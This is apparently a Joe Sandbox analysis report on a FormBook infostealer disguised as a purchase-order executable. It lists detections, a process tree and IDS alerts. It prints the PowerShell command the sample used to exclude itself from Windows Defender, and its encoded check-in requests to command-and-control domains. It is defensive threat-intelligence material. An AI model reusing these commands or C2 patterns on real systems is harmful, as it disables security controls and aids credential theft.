Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 20495088.exe

Overview

General Information

Sample name:PO 20495088.exe
Analysis ID:1557623
MD5:68465dd1e3101b1bfa0cff10ebadb8cc
SHA1:31a5c7aa99d175e9ed04c325831c8ad7b281a255
SHA256:d709e53e4afc4e29076812e41282fe82bcf2f3d73abe7016f13a41f432f4bd75
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO 20495088.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\PO 20495088.exe" MD5: 68465DD1E3101B1BFA0CFF10EBADB8CC)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO 20495088.exe (PID: 4984 cmdline: "C:\Users\user\Desktop\PO 20495088.exe" MD5: 68465DD1E3101B1BFA0CFF10EBADB8CC)
      • sKyuoUfZdk.exe (PID: 2180 cmdline: "C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 2132 cmdline: "C:\Windows\SysWOW64\sdiagnhost.exe" MD5: 76676F0A21E6AF109845151B3CEFE211)
          • sKyuoUfZdk.exe (PID: 1896 cmdline: "C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.PO 20495088.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.PO 20495088.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 20495088.exe", ParentImage: C:\Users\user\Desktop\PO 20495088.exe, ParentProcessId: 2228, ParentProcessName: PO 20495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", ProcessId: 1396, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 20495088.exe", ParentImage: C:\Users\user\Desktop\PO 20495088.exe, ParentProcessId: 2228, ParentProcessName: PO 20495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", ProcessId: 1396, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 20495088.exe", ParentImage: C:\Users\user\Desktop\PO 20495088.exe, ParentProcessId: 2228, ParentProcessName: PO 20495088.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe", ProcessId: 1396, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:53:55.227011+010028554651A Network Trojan was detected192.168.2.54998113.248.169.4880TCP
                2024-11-18T13:54:19.559545+010028554651A Network Trojan was detected192.168.2.549986208.91.197.2780TCP
                2024-11-18T13:54:33.545770+010028554651A Network Trojan was detected192.168.2.549990149.115.238.4480TCP
                2024-11-18T13:54:47.013061+010028554651A Network Trojan was detected192.168.2.54999475.2.103.2380TCP
                2024-11-18T13:55:00.343673+010028554651A Network Trojan was detected192.168.2.5499983.33.130.19080TCP
                2024-11-18T13:55:13.810779+010028554651A Network Trojan was detected192.168.2.550002203.161.49.19380TCP
                2024-11-18T13:55:28.069698+010028554651A Network Trojan was detected192.168.2.550006104.21.74.7980TCP
                2024-11-18T13:55:41.385027+010028554651A Network Trojan was detected192.168.2.55001015.197.204.5680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:54:11.191475+010028554641A Network Trojan was detected192.168.2.549983208.91.197.2780TCP
                2024-11-18T13:54:13.720381+010028554641A Network Trojan was detected192.168.2.549984208.91.197.2780TCP
                2024-11-18T13:54:16.283499+010028554641A Network Trojan was detected192.168.2.549985208.91.197.2780TCP
                2024-11-18T13:54:25.903982+010028554641A Network Trojan was detected192.168.2.549987149.115.238.4480TCP
                2024-11-18T13:54:28.439248+010028554641A Network Trojan was detected192.168.2.549988149.115.238.4480TCP
                2024-11-18T13:54:31.002383+010028554641A Network Trojan was detected192.168.2.549989149.115.238.4480TCP
                2024-11-18T13:54:39.371399+010028554641A Network Trojan was detected192.168.2.54999175.2.103.2380TCP
                2024-11-18T13:54:41.914814+010028554641A Network Trojan was detected192.168.2.54999275.2.103.2380TCP
                2024-11-18T13:54:44.536201+010028554641A Network Trojan was detected192.168.2.54999375.2.103.2380TCP
                2024-11-18T13:54:52.679411+010028554641A Network Trojan was detected192.168.2.5499953.33.130.19080TCP
                2024-11-18T13:54:55.249077+010028554641A Network Trojan was detected192.168.2.5499963.33.130.19080TCP
                2024-11-18T13:54:57.793693+010028554641A Network Trojan was detected192.168.2.5499973.33.130.19080TCP
                2024-11-18T13:55:06.170220+010028554641A Network Trojan was detected192.168.2.549999203.161.49.19380TCP
                2024-11-18T13:55:08.732594+010028554641A Network Trojan was detected192.168.2.550000203.161.49.19380TCP
                2024-11-18T13:55:11.279589+010028554641A Network Trojan was detected192.168.2.550001203.161.49.19380TCP
                2024-11-18T13:55:20.373450+010028554641A Network Trojan was detected192.168.2.550003104.21.74.7980TCP
                2024-11-18T13:55:22.916474+010028554641A Network Trojan was detected192.168.2.550004104.21.74.7980TCP
                2024-11-18T13:55:25.468482+010028554641A Network Trojan was detected192.168.2.550005104.21.74.7980TCP
                2024-11-18T13:55:33.729770+010028554641A Network Trojan was detected192.168.2.55000715.197.204.5680TCP
                2024-11-18T13:55:36.299878+010028554641A Network Trojan was detected192.168.2.55000815.197.204.5680TCP
                2024-11-18T13:55:38.839198+010028554641A Network Trojan was detected192.168.2.55000915.197.204.5680TCP
                2024-11-18T13:55:47.418870+010028554641A Network Trojan was detected192.168.2.550011188.114.97.380TCP
                2024-11-18T13:55:49.916029+010028554641A Network Trojan was detected192.168.2.550012188.114.97.380TCP
                2024-11-18T13:55:52.522957+010028554641A Network Trojan was detected192.168.2.550013188.114.97.380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: PO 20495088.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PO 20495088.exeJoe Sandbox ML: detected
                Source: PO 20495088.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 20495088.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sKyuoUfZdk.exe, 00000008.00000000.2506589550.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3898414307.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdbSHA256 source: PO 20495088.exe
                Source: Binary string: wntdll.pdb source: PO 20495088.exe, PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdb source: PO 20495088.exe
                Source: Binary string: sdiagnhost.pdbGCTL source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001CC700 FindFirstFileW,FindNextFileW,FindClose,9_2_001CC700
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 4x nop then jmp 0748ECAAh0_2_0748E4B6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 4x nop then xor eax, eax9_2_001B9D80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 4x nop then mov ebx, 00000004h9_2_042404DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 149.115.238.44:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 15.197.204.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 149.115.238.44:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 15.197.204.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 75.2.103.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 149.115.238.44:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49981 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 75.2.103.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 149.115.238.44:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 75.2.103.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 15.197.204.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 75.2.103.23:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 15.197.204.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 203.161.49.193:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 75.2.103.23 75.2.103.23
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /qamt/?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp HTTP/1.1Host: www.habitat.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp HTTP/1.1Host: www.fedegaritech.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== HTTP/1.1Host: www.newegg.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp HTTP/1.1Host: www.urssaf.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== HTTP/1.1Host: www.livelovechat.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp HTTP/1.1Host: www.inspires.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== HTTP/1.1Host: www.tenmyk.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficHTTP traffic detected: GET /guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp HTTP/1.1Host: www.isirumah.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                Source: global trafficDNS traffic detected: DNS query: www.habitat.rent
                Source: global trafficDNS traffic detected: DNS query: www.fedegaritech.online
                Source: global trafficDNS traffic detected: DNS query: www.newegg.club
                Source: global trafficDNS traffic detected: DNS query: www.urssaf.pro
                Source: global trafficDNS traffic detected: DNS query: www.livelovechat.live
                Source: global trafficDNS traffic detected: DNS query: www.inspires.website
                Source: global trafficDNS traffic detected: DNS query: www.tenmyk.shop
                Source: global trafficDNS traffic detected: DNS query: www.isirumah.info
                Source: global trafficDNS traffic detected: DNS query: www.ssrnoremt-rise.sbs
